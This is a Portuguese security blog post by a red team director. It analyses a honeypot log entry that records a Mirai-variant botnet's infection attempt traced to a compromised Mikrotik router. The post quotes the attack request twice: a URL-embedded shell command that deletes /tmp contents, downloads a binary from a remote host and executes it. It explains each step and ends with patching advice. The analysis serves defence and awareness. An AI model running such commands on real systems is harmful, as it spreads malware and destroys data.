Insights > Blog

 

 

Qual será a próxima onda de ataques ?

 

Como profissional de cibersegurança, tenho um laboratório próprio com alguns equipamentos virtuais adquiridos ao redor do mundo. O objetivo é simplesmente de pesquisar e realizar testes para identificação de novos ataques, soluções e possibilidades.
Quando os equipamentos não estão sendo utilizados, seguem funcionando como “honeypots” (um computador deixado propositalmente para ser atacado) , coletando registros, ou seja tentativas de acesso também conhecidos como LOG. Novamente, o objetivo é pesquisa e análise futura.

Neste final de semana, encontrei um fato bastante curioso. Analisando os logos de um servidor web identifiquei a seguinte linha – os endereços IP foram anonimizados propositalmente:

77.xxx.xxx.xxxx – – [27/Jun/2020:22:42:32 +0000] “GET /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1” 404 488 “-” “Hello, world”

Essa linha tem a provável composição:

  • Quem?
    o Endereço IP de quem esta fazendo a conexão:
     77.xxx.xxx.xxxx
  • Quando?
    o Data e hora:
     27/Jun/2020:22:42:32 +0000
  • O que?
    o O que o estavam procurando ou acessando?
     /shell?cd+/tmp;rm+rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws
  • Resposta
    o Código da resposta ( certo ou errado )
     404 == Não encontrado
  • Navegador
    o Qual o navegador estavam utilizando para esse acesso?
     Hello, world

Os campos “O que?” e “Navegador” chamam atenção nesta linha. Isto porque é incomum encontrar em acessos legítimos nas linhas de LOG contendo comandos de Linux. Além disso, o último campo deveria ser a identificação do navegador (Mozilla, Chrome, etc ) porém, aparece o texto “Hello, world”.

Entendendo a função do comando “O que?” caso o ataque tivesse sido executado.

 

cd+/tmp    Vá até o diretório temporário
rm+-rf+*  Apague todo o conteúdo desse local
wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86 Vá até o site 185.yyy.yyy.yyy e fará o download do arquivos :UnHAnaAW.x86
chmod+777+/tmp/UnHAnaAW.x86 Mude as permissões do arquivo UnHAnaAW.x86
sh+/tmp/UnHAnaAW.x86+w00dy.jaws  Execute o arquivo UnHAnaAW.x86 passando como parâmetro o texto “w00dy.jaws”

Figura 1

A descrição do “O que” acima, já mostra que o invasor conseguiria executar comandos nas máquinas das vítimas. Isso significa que ele poderia ter acesso total ao equipamento e controlar da maneira que desejar.

Analisando o local de onde o download deveria ter sido realizado, encontramos um repositório com arquivos binários para diferentes plataformas ou equipamento), como pode se observar figura abaixo:

Figura 2

A constatação de que trata-se de uma ação maliciosa, vem também da consulta do arquivo UnHAnaAW.x86 no site do Virustotal (www.virustotal.com), que mostra a identificação do arquivo como malicioso por 40 programas AntiMalware diferentes.
Muitos desses AntiMalwares categorizaram esse arquivo, como uma variação do MIRAI, um malware ou botnet que desde 2016 vem causando impactos. Neste caso, após verificarmos as figuras 2 e 3, identificamos que o arquivo foi criado no dia 09-Junho-2020. Este mesmo arquivo foi enviado para o Virustotal no dia seguinte, ou seja, dia 10-Junho-2020.
Concluímos portanto, que esse arquivo é novo e diferente da versão 2016, podendo conter mais funcionalidades nocivas, porém fazendo parte da mesma família vista desde 2016.


Figura 3

Ao pesquisar o endereço IP que fez o acesso, foi encontrado um roteador da marca Mikrotik.

Figura 4

Então, o que significa tudo isso?
  • O roteador Mikrotik está invadido e procurando novas vítimas para a botnet;
  • É difícil e talvez impossível instalar softwares antivírus em alguns tipos de equipamentos;
  • Existem várias máquinas infectadas espalhadas pelo mundo;
  • Não sabemos:
    • Como essas máquinas serão utilizadas;
    • Quem serão as vítimas;
    • Quando o próximo ataque em massa irá acontecer.
Conclusão.

Nesse exato momento, os dispositivos da sua casa podem estar fazendo parte de uma rede de computadores que foram previamente invadidos e tentando invadir outros dispositivos.
Isso pode ter um impacto inimaginável e provocar perdas intangíveis nas empresas e nos indivíduos.
Por isso, vale ressaltar da necessidade de atualização dos dispositivos domésticos em geral.
Essa investigação foi superficial. Portanto, não se sabe quantas máquinas existem nessa BotNet. De qualquer forma uma máquina maliciosa é sempre um grande risco.
Há mais de um ano, versões diferentes desse software estão vasculhando a internet em busca de novas vítimas e, não temos como prever quando acontecerá um novo ataque em massa .

Se você é um usuário comum de tecnologia, atualize todos os seus dispositivos. Ajude-nos nessa batalha conta ataques e invasões de cibersegurança.
No caso dos profissionais de cibersegurança, revise seus logs buscando anomalias e mantenha todos os sistemas e dispositivos atualizados bem como, sua política de segurança em dia.

 

Referências.
Análise detalhada de versões bem parecidas desse malware, inclusive com os indicativos de comprometimento.

  • https://blog.race-conditions.net/posts/solar-and-solstice-two-mirai-variants/
  • https://otx.alienvault.com/indicator/file/d15b5dc561a5a1606aeba6baf8be670027a890e7
  • https://www.virustotal.com/gui/file/e9bd99ec7054bc2e1c343bd02633920ae4ebf745ca69bbe2271bd6dfaa4a89b9/details

Este artigo foi escrito com o objetivo de alertar que possíveis ataques em massa podem estar por vir. Em nenhum momento, temos o propósito de ensinar como alisar logs.

Autor: Fernando Amatte, diretor de Red Team Services para América Latina.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *

RECEBA NOSSAS NOTÍCIAS!

Information Security Maturity Self-Assessment Survey

Saiba mais

•  Whitepapers
•  E-books
•  Checklists
•  Self-Assessments
•  Webcasts
•  Infographics